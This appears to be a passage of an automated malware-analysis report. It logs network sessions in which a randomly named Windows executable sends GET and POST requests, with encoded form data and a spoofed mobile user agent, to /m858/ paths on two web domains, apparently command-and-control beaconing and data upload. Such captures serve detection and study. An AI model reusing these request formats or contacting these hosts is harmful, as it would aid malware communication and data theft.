                                                                                                                      Data Raw: 53 01 5d c1 8c 64 a5 b3 07 40 33 70 5c 8f 75 de 7f be aa df 7f 4b 33 ef e3 ff 18 da 48 64 0c 40 00 58 45 9a 4a f7 d6 5b 7d b3 cd d6 72 20 12 94 90 b0 3d 02 6a a1 f9 97 6f 5a 2a 04 77 65 bc 0f 22 63 69 c0 3b 1f 24 b2 b9 0f 77 9f e9 56 fd f9 33 28 cd 00 e4 15 0c 59 05 12 7b a2 17 7d 15 79 a6 df 7b fd bb 67 fe 0c b0 70 74 38 b7 fe 8c 5b ee 39 63 23 45 91 b3 91 82 4c 51 f6 87 72 b8 6c 15 64 17 ea 31 54 bb fb 0d 22 72 15 97 a6 f5 fd 61 ad d7 ea 3d ba d7 94 a3 04 92 90 86 0f ea 2e 43 d5 d9 c9 5e bc 1f 03 92 38 5f 08 58 97 b1 ac 96 ce 77 37 ef 6e 0b 21 89 80 10 11 10 e3 c4 0c 02 a6 b7 73 ae 01 93 ee 99 21 d5 76 10 77 e2 68 83 6b 9f ce 90 68 dd 26 62 b6 d3 92 3e 44 07 1d 7f 62 20 6b 73 06 43 4f 49 b2 9f 42 c6 d1 76 3e 83 87 5a b7 df 61 50 75 86 a8 b2 96 29 c0 64 0f 1d 9a fe 20 f1 4b af 55 bb e6 1c 6d a1 2a f5 14 18 77 0c da ce 02 a3 0a d0 da a3 9c a7 f0 91 d5 4b ba 3d 80 27 0a 8e 78 26 08 6f ad f4 6c bf 59 3d 2e ad 1a 79 3d da c6 34 e9 f9 d9 4a 38 fa 02 2b 58 6f e7 a4 2e ae ca d6 00 9d 53 29 5b 1c 57 f4 2e ad d6 eb 7d b3 a5 b9 07 a2 13 54 3e a7 ea 5a 6b a8 f5 1c 92 bd 36 fb 94 68 77 23 20 21 b6 8a d6 6a d7 c2 54 19 d0 06 8f f0 42 f0 a8 54 c9 e0 e1 09 e5 c5 5a 2f 1f 7d 6b 44 05 fb f9 15 31 e4 38 ed 15 74 f1 f1 71 66 b6 73 7d 7f bb f9 a5 57 4d f7 4d 3f 29 6b 31 1c 85 0c 46 64 20 0b 5f 87 3a 2c 5d 6a 92 97 f5 cb da d0 0b de ce cb fe 37 dd 97 b5 8f e8 bd ac 5f 3f 8f 97 35 f7 29 a3 ec 65 1d 89 6b 24 5e d6 08 23 75 b5 28 41 c6 f9 1a 80 30 32 e7 03 ce 39 73 3e 3c 1e 36 e7 c3 97 97 6f 30 e7 1f ed 4e 43 a1 2e 1b 51 d1 b5 85 b4 55 b9 0d bc b7 58 72 f2 65 7d e9 89 cb 38 f4 b2 fe 66 0a b1 76 9b f8 9e 36 8d 95 1f f9 ac 86 2c a4 3e 15 68 9a d2 f9 fa ed dd 51 1e c0 c4 0e 81 36 b0 03 54 9b 04 95 8b 55 09 6f d7 f3 bb dd 85 0e 3b 1a b7 be f1 82 0e 1b ac d2 6d df 0b 85 a3 e6 ec 70 db be 60 b3 d1 93 3c d3 1f ca 58 93 28 1c 77 a6 12 ef ce d7 55 f0 d2 93 fa a5 72 dc 29 35 5d fa b8 ba f6 c9 76 83 3c 28 6a 94 fd ab 55 8d d3 61 8f 5f 52 2f 7d be ae 6e 8e 75 dd c1 d3 29 e5 8e d3 44 c2 44 df c5 96 bc 9e a2 de ee 93 f8 5d 15 d6 61 98 61 45 0b d9 9e a5 a1 8e c6 17 f1 71 b6 3e 09 17 2b 5a e9 ba fe 43 5d ad 63 31 c3 2c 9c 75 6d 46 e9 07 fe aa 5b eb 89 0f c3 20 6f 8e a2 07 65 3d f6 83 fe 2c ad 44 df a2 bb 02 be bc 5c 3c 64 0e 5d b7 b7 db 02 53 e4 03 53 cf d2 08 24 f7 23 3a a0 b0 0d 94 7f 15 50 59 96 0d cf 76 37 b9 4c fe ea 13 45 8e 4b 1d eb 8e 85 34 0a c5 b4 19 94 54 06 54 5f 2c 7a 39 95 b1 57 bc 9c ca aa f2 5e 4e 95 62 d5 cb 49 30 56 be 9c 44 28 a3 d2 d1 10 e8 ce fb 47 e0 be bb e3 c9 1d ea eb cb 4a fe bd ae 87 36 13 a2 10 68 2b 77 b9 7c ff b6 aa f2 bf 6d ef b3 eb 8b 30 fa fb 37 8a df
                                                                                                                      Data Ascii: S]d@3p\uK3Hd@XEJ[}r =joZ*we"ci;$wV3(Y{}y{gpt8[9c#ELQrld1T"ra=.C^8_Xw7n!s!vwhkh&b>Db ksCOIBv>ZaPu)d KUm*wK='x&olY=.y=4J8+Xo.S)[W.}T>Zk6hw# !jTBTZ/}kD18tqfs}WMM?)k1Fd _:,]j7_?5)ek$^#u(A029s><6o0NC.QUXre}8fv6,>hQ6TUo;mp`<X(wUr)5]v<(jUa_R/}nu)DD]aaEq>+ZC]c1,umF[ oe=,D\<d]SS$#:PYv7LEK4TT_,z9W^NbI0VD(GJ6h+w|m07
                                                                                                                      Dec 7, 2023 15:55:17.383953094 CET1286INData Raw: 18 8c a0 ea d4 45 bd 99 f2 49 08 2b 68 a5 bb 16 bb 0e 96 a9 70 1d 8b 2a e4 a6 62 60 07 41 6f 61 6f 81 ee eb 55 c5 49 ec ec a5 e1 21 7e a3 f0 fd 89 aa bc 67 fb 19 77 a2 a0 8f 6b cd 57 57 60 54 73 43 86 76 57 84 41 e2 62 89 ee b2 40 f1 b4 5d 05 ff
                                                                                                                      Data Ascii: EI+hp*b`AoaoUI!~gwkWW`TsCvWAb@]jDTtZ.<mrXqKX@.`885^D8:"|o\e4z%QB>ZuvEn"7o{V:+7!"7g
                                                                                                                      Dec 7, 2023 15:55:17.383966923 CET1286INData Raw: c2 bb 2a a6 21 f6 5b ae 66 d3 82 a2 ed bf de ee cc 67 4a 25 1b 18 58 e1 59 0e 1d 6b cb 64 f1 e5 9b 87 c3 74 6e 8b 2c 4e 0c 1a d8 ee e3 87 ef dd 74 5a 83 10 2b 28 6f 97 85 54 04 6f d2 49 62 da 67 e6 31 c3 5c 8e 32 3b 7c 96 83 83 9c d6 35 5a 64 d3
                                                                                                                      Data Ascii: *![fgJ%XYkdtn,NtZ+(oToIbg1\2;|5Zdy${2YJ-xjdx+(U.&*ie:Y1'lje8{DyTtlPM:1B?wx[9}(6L]{Dp6t!D"^$_N>yj!~0tZ
                                                                                                                      Dec 7, 2023 15:55:17.384026051 CET1286INData Raw: f3 c0 4c 55 48 34 cf 62 6e bb 9c 5f 07 72 45 a2 49 98 b3 37 d0 a8 59 89 3c a1 20 00 05 22 34 5d 12 25 5a 95 e7 c2 d4 a6 ff 17 19 e8 0f f4 3a 26 36 1f 80 fc 83 69 83 3d f4 c8 26 bc 97 e7 ff 76 dd 8f aa 81 0e f6 27 1b 3c bf 05 7a 10 38 d8 6e 0a 6c
                                                                                                                      Data Ascii: LUH4bn_rEI7Y< "4]%Z:&6i=&v'<z8nlvXM4(a/7f.yN5xYFsH*BZ&f"frN<~T}$}2{_Hrj[b.JU,@_lV={].
                                                                                                                      Dec 7, 2023 15:55:17.384067059 CET1286INData Raw: 99 f4 09 3d 75 f5 d4 99 90 16 2c 0b 0b e7 00 0b 24 9a d4 9b 30 11 a3 7e 6b d9 aa aa 42 19 14 6e 74 4f d0 e4 3e c0 e6 1f 85 71 fe eb a2 f7 35 db 20 36 14 2b 61 fc 7a 6c a9 0e 8b e7 78 48 fc b4 21 4b 82 1e de c1 16 56 0d 55 3d ac 70 dd 1e d9 61 8e
                                                                                                                      Data Ascii: =u,$0~kBntO>q5 6+azlxH!KVU=pa =H8F8,By~V(u&Q`h86A74ni|X<cUKIW>=/?z:4DWY*SqG-x2x+|sA(Xr
                                                                                                                      Dec 7, 2023 15:55:17.384124041 CET1286INData Raw: b9 47 d2 47 12 c8 d9 6d 61 9f 93 8e 97 17 03 ca 43 e3 8a c6 ee 91 f4 91 04 72 66 5b 0c 1b 35 fc 2d b1 64 11 7b 5e 10 84 e9 a7 09 fe fb ac aa 92 ed bd 29 21 7a db 3a 8e 7b c9 70 d8 cf a4 fd 8a 32 cc 68 18 b8 3a 0b 5f 98 3a fc 69 6a 98 0a ba 01 ad
                                                                                                                      Data Ascii: GGmaCrf[5-d{^)!z:{p2h:_:ijc?O}|eDo1H`QMOryYfoTMv{8e!a GDWm*[`^RwQswF-TcGY$.h7'zalGfQBlWN;Hi
                                                                                                                      Dec 7, 2023 15:55:17.384176016 CET1286INData Raw: c0 57 f0 46 99 be ae 49 45 19 3a 32 29 6d cc fb 09 a3 cd a1 b1 f1 60 86 4d 83 5e 3d 53 c0 02 86 c5 93 82 95 ae 25 42 80 cb 62 23 8d bd ef 84 c1 78 43 37 35 23 f9 66 48 3d 4f de 70 cb b3 79 86 7d 77 25 bd 2c be 97 0a 9c 5a cc a4 be f7 43 9a ee 87
                                                                                                                      Data Ascii: WFIE:2)m`M^=S%Bb#xC75#fH=Opy}w%,ZCR!H;xb&dZWc=m:\hr#T9qu`}4cBq!dy)ZM`!gIb-U".PQ*n"|/Zc[sZ^@:"b:L
                                                                                                                      Dec 7, 2023 15:55:17.384222031 CET1286INData Raw: 8d c3 65 71 bd 65 78 8d 3c 8a 31 52 52 d8 7c de e2 82 82 5d 24 cf e8 49 43 54 a9 b8 11 40 c7 95 de cc 81 2a b9 55 1a 83 39 05 be 4c c1 39 97 25 b3 23 f6 e8 2a 95 57 ec 82 4a 15 69 96 15 89 08 de 25 49 ba 2b 94 4a 32 a4 21 c2 55 24 0f 74 7c 76 d5
                                                                                                                      Data Ascii: eqex<1RR|]$ICT@*U9L9%#*WJi%I+J2!U$t|vMLggrJdGLUbQ12 "5!#Pil%BwW=?nyJei4K4J+*yrl9j/7Iryi=|H5I1KIaXoJ
                                                                                                                      Dec 7, 2023 15:55:17.384422064 CET1286INData Raw: 2b bb a8 7b 04 17 60 f7 a2 f9 8f 63 7f a1 26 f1 ab 05 cb 7e 42 b6 2d ac 44 e2 fa 1b b0 4e 0c bd 2e f3 30 82 d4 a5 02 ee ac 4d 41 f0 34 ee 37 22 12 06 6a 0c 2e bc e5 2f 62 55 ac f0 22 59 36 77 5e 2a e3 5c 09 aa 1a 40 64 71 d6 a8 a4 fb bd 29 d9 a4
                                                                                                                      Data Ascii: +{`c&~B-DN.0MA47"j./bU"Y6w^*\@dq)xt.:c@Lw(`tQOcU<ed m X-P<zbiYb"N{Am[pkOiM:KmB @\F04S?2_1CfPc~bG_a
                                                                                                                      Dec 7, 2023 15:55:17.384490967 CET1286INData Raw: f7 a5 a0 9a a4 6e 02 6c a0 3a 93 ca 5c a9 49 1d a2 94 a4 69 0c 3d b9 91 33 1e 39 76 ae c4 c0 27 b7 a2 ba 80 98 8b ec 51 2f dc e9 2d d5 20 93 3b 8c cf 7e 90 ad ad 8c be d4 ae b5 90 ec 77 cc 8d ae a4 bd d7 90 d3 aa d9 ac b3 6f 81 d6 3b 3e 79 ba 33
                                                                                                                      Data Ascii: nl:\Ii=39v'Q/- ;~wo;>y3Ayq~D0r!Ovxos:A3L;;)eR_A Q#Mfqg$u8#01rj:sG-_bUNp:#.z~bAgO1ygxQ4
                                                                                                                      Dec 7, 2023 15:55:17.384506941 CET1286INData Raw: dc b2 f1 15 f1 3d 35 68 9b 2f 3c 80 d4 9d 37 a5 e2 d3 55 26 4b 99 41 d4 30 ab ac 05 35 79 00 d1 3f 57 d6 1e 8b 18 1e 9d 8f ad bb 06 25 01 00 c6 89 6d cd 3c 3b 9d ff 39 2f 7e f6 07 c7 a0 ed 2c d1 75 1e fa a8 9f b3 21 4e 51 13 b6 8e 3a f3 ba 6c 07
                                                                                                                      Data Ascii: =5h/<7U&KA05y?W%m<;9/~,u!NQ:l'iLV7}zh+:l/?I-h6KT 1MAj/^3Wu}7'?M{7.S4]o~;O]""BF(n'3`pxR]~PUI:"]


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      36192.168.2.114974768.178.195.71802016C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 15:55:19.748173952 CET446OUTGET /m858/?GJ=C4IdWhJXSFOXR8D&yRV=YaKeKM0UqinIxXqyt1dkMasU/gJKxJDaurUM7ZyBp3QsCSEIlQr7ZxZGtQx938wNB79Up+t5frQyoMoLXF0pSDhyD7Jeln3ZaQ== HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Host: www.blessingstation.org
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Dec 7, 2023 15:55:20.024919987 CET527INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Thu, 07 Dec 2023 14:55:17 GMT
                                                                                                                      Server: Apache
                                                                                                                      X-Powered-By: PHP/7.4.33
                                                                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                      X-Redirect-By: WordPress
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Location: http://blessingstation.org/m858/?GJ=C4IdWhJXSFOXR8D&yRV=YaKeKM0UqinIxXqyt1dkMasU/gJKxJDaurUM7ZyBp3QsCSEIlQr7ZxZGtQx938wNB79Up+t5frQyoMoLXF0pSDhyD7Jeln3ZaQ==
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Length: 0
                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      37192.168.2.114974884.32.84.32802016C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 15:55:25.654483080 CET722OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.cjjmobbbshhhu.shop
                                                                                                                      Origin: http://www.cjjmobbbshhhu.shop
                                                                                                                      Referer: http://www.cjjmobbbshhhu.shop/m858/
                                                                                                                      Content-Length: 184
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 79 52 56 3d 59 56 73 2b 76 33 77 4b 7a 50 6b 43 46 5a 44 68 68 6c 66 78 67 39 4c 37 70 70 57 66 46 4d 72 4f 42 2f 52 50 49 79 6f 70 46 4f 75 49 6d 61 2f 35 2b 44 77 44 53 4c 71 6a 48 49 5a 4a 53 79 42 2f 78 6a 6d 36 41 4d 4f 36 76 2f 79 57 6d 59 71 6b 57 72 6a 35 72 69 6b 42 50 78 59 62 53 46 31 79 39 33 6e 42 68 34 5a 45 44 4e 76 76 49 4e 79 51 54 52 4f 68 62 42 78 47 51 4c 4a 73 6f 63 4a 75 56 39 55 43 4b 49 44 47 6c 45 46 4f 2f 41 6c 7a 46 61 45 76 55 73 50 36 37 49 6d 32 68 38 6a 2b 4f 4e 4c 65 5a 34 79 5a 6b 30 32 34 79 4e 4b 48 43 67 3d 3d
                                                                                                                      Data Ascii: yRV=YVs+v3wKzPkCFZDhhlfxg9L7ppWfFMrOB/RPIyopFOuIma/5+DwDSLqjHIZJSyB/xjm6AMO6v/yWmYqkWrj5rikBPxYbSF1y93nBh4ZEDNvvINyQTROhbBxGQLJsocJuV9UCKIDGlEFO/AlzFaEvUsP67Im2h8j+ONLeZ4yZk024yNKHCg==


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      38192.168.2.114974984.32.84.32802016C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 15:55:28.361023903 CET742OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.cjjmobbbshhhu.shop
                                                                                                                      Origin: http://www.cjjmobbbshhhu.shop
                                                                                                                      Referer: http://www.cjjmobbbshhhu.shop/m858/
                                                                                                                      Content-Length: 204
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 79 52 56 3d 59 56 73 2b 76 33 77 4b 7a 50 6b 43 45 39 48 68 6e 79 7a 78 6c 64 4c 36 73 70 57 66 50 73 71 6d 42 2f 56 50 49 32 78 78 45 39 61 49 6d 2f 54 35 2f 42 49 44 58 4c 71 6a 54 59 5a 51 57 79 42 77 78 6a 71 59 41 4a 32 36 76 37 61 57 6d 59 36 6b 58 61 6a 36 71 79 6b 44 57 68 59 5a 50 56 31 79 39 33 6e 42 68 34 4e 36 44 4a 44 76 4a 34 36 51 53 31 36 67 56 68 78 42 5a 72 4a 73 2f 73 4a 71 56 39 55 77 4b 4d 44 67 6c 47 4e 4f 2f 46 5a 7a 45 4f 59 67 61 73 4f 51 6b 59 6e 7a 6f 64 53 63 46 63 43 79 42 4b 7a 6d 75 52 7a 31 33 59 6d 55 46 56 2f 73 61 61 63 37 68 52 56 42 63 68 4b 31 55 50 42 4f 32 64 73 3d
                                                                                                                      Data Ascii: yRV=YVs+v3wKzPkCE9HhnyzxldL6spWfPsqmB/VPI2xxE9aIm/T5/BIDXLqjTYZQWyBwxjqYAJ26v7aWmY6kXaj6qykDWhYZPV1y93nBh4N6DJDvJ46QS16gVhxBZrJs/sJqV9UwKMDglGNO/FZzEOYgasOQkYnzodScFcCyBKzmuRz13YmUFV/saac7hRVBchK1UPBO2ds=


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      39192.168.2.114975084.32.84.32802016C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 15:55:31.064364910 CET1755OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.cjjmobbbshhhu.shop
                                                                                                                      Origin: http://www.cjjmobbbshhhu.shop
                                                                                                                      Referer: http://www.cjjmobbbshhhu.shop/m858/
                                                                                                                      Content-Length: 1216
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 79 52 56 3d 59 56 73 2b 76 33 77 4b 7a 50 6b 43 45 39 48 68 6e 79 7a 78 6c 64 4c 36 73 70 57 66 50 73 71 6d 42 2f 56 50 49 32 78 78 45 39 43 49 6d 4e 62 35 2b 67 49 44 51 4c 71 6a 50 6f 5a 4e 57 79 42 58 78 6a 79 63 41 49 4c 42 76 35 69 57 6c 2b 32 6b 65 50 44 36 6b 79 6b 44 4c 78 59 59 53 46 30 36 39 33 32 49 68 34 64 36 44 4a 44 76 4a 35 4b 51 56 68 4f 67 46 52 78 47 51 4c 4a 67 6f 63 4a 4f 56 39 4e 48 4b 4d 48 57 6c 79 35 4f 2f 6c 70 7a 4a 64 77 67 53 73 4f 53 6e 59 6e 56 6f 64 65 71 46 63 65 49 42 4b 57 39 75 52 4c 31 6e 76 6d 50 63 52 2f 41 46 5a 6b 31 6a 6b 31 63 5a 78 58 5a 48 4e 51 49 30 59 46 4c 6e 78 45 36 30 72 73 35 39 4e 64 34 6d 71 57 6a 6f 31 63 51 4a 58 41 4b 63 44 46 78 4d 44 44 62 47 52 62 5a 32 55 33 52 62 6f 30 67 37 78 71 6f 78 32 47 57 50 67 4c 4f 59 4c 6a 47 50 71 75 71 4c 73 68 6b 5a 78 36 76 67 7a 59 53 55 57 49 5a 72 50 79 51 41 4b 41 36 77 46 48 6c 6b 33 2f 57 50 73 30 73 56 7a 55 6c 39 6c 43 30 50 31 5a 4b 4a 42 56 49 56 39 62 47 59 4c 79 64 6b 38 44 66 4e 6c 69 6b 78 37 49 6b 75 36 34 55 6f 31 44 46 77 52 64 2f 62 45 52 76 6c 73 7a 75 42 44 42 57 53 66 46 6d 5a 2b 62 38 73 61 7a 7a 55 63 69 64 6b 43 65 58 49 6b 6c 48 53 70 46 6d 45 52 44 35 44 76 38 48 42 7a 6a 55 30 4f 65 2f 32 71 50 54 71 57 2f 72 67 45 5a 4f 76 45 70 67 54 73 44 69 55 50 30 48 2f 48 62 56 39 75 75 62 56 67 56 72 74 6e 32 45 56 78 36 48 2b 34 55 4f 50 4d 30 73 75 70 69 6d 74 48 51 36 78 79 4b 2f 79 35 38 37 74 54 63 6a 52 7a 4c 7a 49 75 79 38 34 4f 36 56 5a 64 32 52 35 6f 6e 69 2b 6f 54 71 42 78 75 7a 62 41 62 73 47 6f 2b 2f 37 46 75 4f 37 47 51 65 38 34 63 75 73 64 46 71 56 71 64 66 63 71 39 63 35 77 76 70 6f 6e 6c 37 67 77 35 4f 31 31 45 43 59 76 6b 6c 54 6c 56 46 78 56 41 6c 41 4c 59 36 55 72 30 35 2b 62 6b 4b 57 4c 68 33 57 54 4c 35 6a 69 39 4d 54 42 6c 33 4c 52 31 37 32 5a 2b 63 7a 57 2b 4f 61 68 78 4d 74 5a 45 4c 77 4d 43 4d 38 77 50 64 56 4b 38 48 46 54 32 73 4c 52 2f 66 77 4c 50 72 48 69 41 75 5a 72 45 2f 48 46 45 64 41 51 2f 31 2f 47 67 48 42 7a 30 61 65 72 59 2f 55 44 58 37 6a 6a 37 35 6a 76 65 2f 54 63 4b 72 79 56 42 43 4e 53 67 6f 2f 6d 7a 4c 75 43 33 33 44 72 58 41 36 6b 6c 73 4f 38 51 76 73 6a 6a 66 2b 55 52 67 4d 72 78 75 6c 4d 36 45 37 2f 4c 66 63 66 48 75 42 43 32 69 34 43 45 6c 51 43 64 39 6e 4e 63 33 52 6f 6b 63 2b 57 75 37 30 49 37 62 42 53 2b 57 38 5a 71 62 78 41 48 4a 58 5a 33 65 77 6d 31 77 4d 67 63 5a 66 35 4d 71 64 44 51 45 66 75 50 50 4b 49 69 4a 72 6e 48 61 51 6a 54 76 36 6d 4b 51 73 44 4b 65 4d 45 59 31 4d 33 42 4c 31 72 75 62 75 6a 38 7a 78 4a 4d 6c 31 45 38 7a 41 5a 44 6e 71 51 55 57 73 58 48 35 6f 6a 62 67 47 2b 38 65 37 74 46 35 2f 49 6b 50 42 35 2b 71 55 55 43 77 73 6c 37 6d 6f 6a 6c 2b 72 6b 2b 53 43 4a 69 76 76 57 47 66 57 37 6b 68 33 62 4d 72 75 7a 58 73 4e 32 67 61 55 58 73 35 48 6b 45 4c 46 71 77 38 30 50 53 71 47 77 43 2b 65 59 72 4a 32 78 41 4e 33 4c 54 72 76 55 4e 48 6f 32 30 6f 2b 42 43 48 46 70 4b 36 75 33 67 45 79 4f 64 34 66 2b 35 79 76 64 36 6e 70 56 37 4c 2f 4f 2b 36 59 38 68 65 68 58 62 78 47 53 54 74 75 31 50 7a 2b 78 43 6a 72 2b 79 64 50 6e 42 41 55 36 77 65 49 63 33 4c 79 33 55 72 33 58 73 4d 64 30 30 6e 35 76 76 4d 48 76 6f 35 74 59 62 2b 76 35 54 39 47 4e 50 45 68 42 44 73 36 51 38 6f 2b 69 49 39 50 49 52 56 30 59 64 4b 33 69 43 68 74 66 49 72 4a 41 4a 66 62 56 2f 50 79 30 78 5a 73 6e 4f 42 73 66 65 59 68 6b 79 6e 46 38 69 51 74 46 52 73 58 49 45 4f 35 42 35 4c 38 58 4b 4c 45 58 72 4e 75 35 4b 4f 6a 31 66 78 35 73 38 71 6c 52 52 35 70 61 67 69 71 39 73 52 2f 62 46 56 51 48 63 6f 63 4d 4d 66 4f 73 74 45 33 2f 30 55 32 6a 47 6b 31 68 77 72 54 69 6a 39 6a 4c 4a 5a 6f 74 39 36 52 54 63 71 6a 76 6f 58 55 68 72 74 2b 74 50 67 7a 32 31 36
                                                                                                                      Data Ascii: yRV=YVs+v3wKzPkCE9HhnyzxldL6spWfPsqmB/VPI2xxE9CImNb5+gIDQLqjPoZNWyBXxjycAILBv5iWl+2kePD6kykDLxYYSF06932Ih4d6DJDvJ5KQVhOgFRxGQLJgocJOV9NHKMHWly5O/lpzJdwgSsOSnYnVodeqFceIBKW9uRL1nvmPcR/AFZk1jk1cZxXZHNQI0YFLnxE60rs59Nd4mqWjo1cQJXAKcDFxMDDbGRbZ2U3Rbo0g7xqox2GWPgLOYLjGPquqLshkZx6vgzYSUWIZrPyQAKA6wFHlk3/WPs0sVzUl9lC0P1ZKJBVIV9bGYLydk8DfNlikx7Iku64Uo1DFwRd/bERvlszuBDBWSfFmZ+b8sazzUcidkCeXIklHSpFmERD5Dv8HBzjU0Oe/2qPTqW/rgEZOvEpgTsDiUP0H/HbV9uubVgVrtn2EVx6H+4UOPM0supimtHQ6xyK/y587tTcjRzLzIuy84O6VZd2R5oni+oTqBxuzbAbsGo+/7FuO7GQe84cusdFqVqdfcq9c5wvponl7gw5O11ECYvklTlVFxVAlALY6Ur05+bkKWLh3WTL5ji9MTBl3LR172Z+czW+OahxMtZELwMCM8wPdVK8HFT2sLR/fwLPrHiAuZrE/HFEdAQ/1/GgHBz0aerY/UDX7jj75jve/TcKryVBCNSgo/mzLuC33DrXA6klsO8Qvsjjf+URgMrxulM6E7/LfcfHuBC2i4CElQCd9nNc3Rokc+Wu70I7bBS+W8ZqbxAHJXZ3ewm1wMgcZf5MqdDQEfuPPKIiJrnHaQjTv6mKQsDKeMEY1M3BL1rubuj8zxJMl1E8zAZDnqQUWsXH5ojbgG+8e7tF5/IkPB5+qUUCwsl7mojl+rk+SCJivvWGfW7kh3bMruzXsN2gaUXs5HkELFqw80PSqGwC+eYrJ2xAN3LTrvUNHo20o+BCHFpK6u3gEyOd4f+5yvd6npV7L/O+6Y8hehXbxGSTtu1Pz+xCjr+ydPnBAU6weIc3Ly3Ur3XsMd00n5vvMHvo5tYb+v5T9GNPEhBDs6Q8o+iI9PIRV0YdK3iChtfIrJAJfbV/Py0xZsnOBsfeYhkynF8iQtFRsXIEO5B5L8XKLEXrNu5KOj1fx5s8qlRR5pagiq9sR/bFVQHcocMMfOstE3/0U2jGk1hwrTij9jLJZot96RTcqjvoXUhrt+tPgz216


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      40192.168.2.114975184.32.84.32802016C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 15:55:33.767606020 CET445OUTGET /m858/?yRV=VXEesAUKk48GI7/v/F/vk/2J7KfCFYqlfqdzSz80FcScnenugkkRQu/gNtJifjh8nwe2JaaLs5Szx6+RWLiYozgxOSovEmgHpQ==&GJ=C4IdWhJXSFOXR8D HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Host: www.cjjmobbbshhhu.shop
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Dec 7, 2023 15:55:33.944278955 CET1286INHTTP/1.1 200 OK
                                                                                                                      Server: hcdn
                                                                                                                      Date: Thu, 07 Dec 2023 14:55:33 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 10066
                                                                                                                      Connection: close
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      x-hcdn-request-id: 5333c2536099ed31505bbe105e85a680-phx-edge3
                                                                                                                      Expires: Thu, 07 Dec 2023 14:55:32 GMT
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Accept-Ranges: bytes
